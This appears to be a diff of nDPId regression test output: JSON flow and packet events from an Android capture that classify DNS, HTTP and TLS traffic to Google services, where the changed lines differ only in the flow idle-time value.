00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454871115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871115,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8q7VAAEARCZrAqAIQwKgCAZ6EADUAKMiehDwBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454871117,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871117,"pkt":"TGr2n\/YnxiwDYGpkCABFAABM2yQAAEARGhvAqAIBwKgCEAA1noQAOIeohDyBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871117,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454871128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871128,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA83d0AAGcGtfGtwk9ywKgCEABQj+ImKPRybuhwKaAS87giVwAAAgQFlgQCCArBhO\/i\/\/82yQEDAwg="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454871130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871130,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0RuJAAEAGM\/XAqAIQrcJPco\/iAFBu6HApJij0c4AQAVdDYAAAAQEICv\/\/NtHBhO\/i"} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454871132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871132,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8KYcAAHYGldms2RXKwKgCEAG7ytjkokMBL2I0XaAS6yDzNwAAAgQFZAQCCAptKuid\/\/82ywEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454871135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871135,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0AphAAEAGstDAqAIQrNkVysrYAbsvYjRd5KJDAoAQAVcLdwAAAQEICv\/\/NtNtKuid"} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871152,"flow_last_seen":1582454871152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871152,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454871152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871152,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA82rlAAEAGneLAqAIQ2O8meIDkAbvMauxuAAAAAKAC\/\/8TjwAAAgQFtAQCCAr\/\/zbXAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1582454871166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871166,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA82hIAAHUGqYnY7yZ4wKgCEAG7gOSVNE5IzGrsb6AS6yB0TQAAAgQFZAQCCArIBAje\/\/821wEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1582454871167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871167,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA02rpAAEAGnenAqAIQ2O8meIDkAbvMauxvlTROSYAQAVeMkAAAAQEICv\/\/NtvIBAje"} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454871128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871128,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA83d0AAGcGtfGtwk9ywKgCEABQj+ImKPRybuhwKaAS87giVwAAAgQFlgQCCArBhO\/i\/\/82yQEDAwg="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454871130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871130,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0RuJAAEAGM\/XAqAIQrcJPco\/iAFBu6HApJij0c4AQAVdDYAAAAQEICv\/\/NtHBhO\/i"} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454871132,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871132,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8KYcAAHYGldms2RXKwKgCEAG7ytjkokMBL2I0XaAS6yDzNwAAAgQFZAQCCAptKuid\/\/82ywEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454871135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871135,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0AphAAEAGstDAqAIQrNkVysrYAbsvYjRd5KJDAoAQAVcLdwAAAQEICv\/\/NtNtKuid"} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871152,"flow_last_seen":1582454871152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871152,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454871152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871152,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA82rlAAEAGneLAqAIQ2O8meIDkAbvMauxuAAAAAKAC\/\/8TjwAAAgQFtAQCCAr\/\/zbXAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1582454871166,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871166,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA82hIAAHUGqYnY7yZ4wKgCEAG7gOSVNE5IzGrsb6AS6yB0TQAAAgQFZAQCCArIBAje\/\/821wEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1582454871167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871167,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA02rpAAEAGnenAqAIQ2O8meIDkAbvMauxvlTROSYAQAVeMkAAAAQEICv\/\/NtvIBAje"} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 